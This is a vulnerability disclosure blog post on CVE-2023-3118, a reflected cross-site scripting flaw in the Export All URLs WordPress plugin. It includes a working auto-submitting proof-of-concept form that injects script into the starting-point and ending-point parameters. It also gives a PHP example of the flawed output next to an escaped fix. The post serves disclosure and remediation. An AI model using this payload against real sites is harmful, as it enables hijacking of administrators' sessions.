YouGina
CVE-2023-3118 - Reflected Cross-Site Scripting Vulnerability in Export All URLs WordPress Plugin
Published: 2023-07-13
During my recent code audit of various popular WordPress plugins, I discovered another vulnerability, this time in the Export All URLs WordPress plugin. This vulnerability, assigned CVE-2023-3118, allows for a reflected cross-site scripting (XSS) attack, which can be exploited against high privilege users, including administrators. This article provides detailed information about the vulnerability, its impact, and recommended actions to mitigate the risk.
The Export All URLs WordPress plugin before version 4.6 is vulnerable to reflected cross-site scripting (XSS). The plugin fails to properly sanitize and escape user-supplied parameters before outputting them back in the page, allowing an attacker to inject JavaScript that runs in the victim's browser.
The vulnerability can be triggered by making a logged-in admin user visit a page containing the following HTML code:
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/tools.php?page=extract-all-urls-settings" method="POST">
<input type="hidden" name="starting-point" value='"><script>alert(/XSS-starting-point/)</script>' />
<input type="hidden" name="ending-point" value='"><script>alert(/XSS-ending-point/)</script>' />
<input type="submit" value="submit">
</form>
</body>
In the above code, the page includes an HTML form with hidden input fields. The starting-point and ending-point parameters are the ones vulnerable to cross-site scripting: their values are neither sanitized on input nor escaped on output, so a double quote in the value closes the HTML attribute and the remainder is parsed as markup. The injected JavaScript within the value attributes of these parameters is executed when the form is automatically submitted by the `onload` event in the `<body>` tag.
Impact:
An attacker can exploit this vulnerability by tricking a high privilege user, such as an administrator, into visiting a specially crafted page. Once the user visits the page, the injected JavaScript code executes within the user's browser, potentially allowing the attacker to perform malicious actions within the context of the user's session, such as stealing sensitive information, modifying website content, or performing other actions on behalf of the user. Additionally, the attacker can leverage the compromised admin privileges to further exploit the WordPress environment, potentially leading to a complete compromise of the website or server.
Solution:
To address this vulnerability, the maintainers of the Export All URLs WordPress plugin have released an updated version (4.6) that properly sanitizes and escapes user-supplied input.
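To make the bug class and its fix concrete, here is an added PHP example (not the Export All URLs plugin's code, which is not reproduced here) showing a settings form that echoes the starting-point value back into an attribute unescaped, next to a version hardened with `htmlspecialchars()`, the plain-PHP equivalent of WordPress's `esc_attr()`. The `render_*` and `attribute_breaks_out` helpers are illustrative names, and the input is constructed from the payload shape shown above.

```php
<?php
// Added example: illustrative settings form, not the plugin's own code.
// render_vulnerable() mirrors the flawed pattern: the submitted value is
// placed straight into a value="..." attribute, so a double quote closes the
// attribute and anything after it is parsed as markup.
function render_vulnerable(array $post): string {
    $start = $post['starting-point'] ?? '';
    return '<input type="text" name="starting-point" value="' . $start . '" />';
}

// render_fixed() escapes for an HTML attribute context. htmlspecialchars() with
// ENT_QUOTES encodes both quote styles as well as <, > and &. In a WordPress
// plugin the same effect comes from sanitize_text_field() on input and
// esc_attr() at the point of output.
function render_fixed(array $post): string {
    $start = $post['starting-point'] ?? '';
    $start = htmlspecialchars($start, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="starting-point" value="' . $start . '" />';
}

// Review check a defender can run over rendered output: a safe rendering of a
// single field contains exactly one element start tag. Any additional
// "<letter" means the attribute was closed early and new markup was injected.
function attribute_breaks_out(string $html): bool {
    return preg_match_all('/<[a-zA-Z]/', $html) !== 1;
}

// Constructed input: the starting-point payload shape from the advisory.
$payload = ['starting-point' => '"><script>alert(/XSS-starting-point/)</script>'];

$vuln  = render_vulnerable($payload);
$fixed = render_fixed($payload);

echo "Vulnerable: $vuln\n";
echo "Fixed:      $fixed\n";
echo 'Vulnerable output breaks out of the attribute: '
    . (attribute_breaks_out($vuln) ? 'yes' : 'no') . "\n";
echo 'Fixed output breaks out of the attribute:      '
    . (attribute_breaks_out($fixed) ? 'yes' : 'no') . "\n";
```

Run with `php example.php`: the vulnerable rendering contains a second start tag (`<script`) while the fixed rendering keeps the whole payload inside the attribute as `&quot;&gt;&lt;script&gt;...`.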
Affected Versions:
The reflected cross-site scripting (XSS) vulnerability exists in the Export All URLs WordPress plugin versions prior to 4.6. Users of affected versions should update to the latest version as soon as possible to protect their WordPress installations from potential exploitation.
References:
- Export All URLs Plugin: https://wordpress.org/plugins/export-all-urls/
- CVE-2023-3118: https://nvd.nist.gov/vuln/detail/CVE-2023-3118
- WP-Scan: https://wpscan.com/vulnerability/8a9efc8d-561a-42c6-8e61-ae5c3be581ea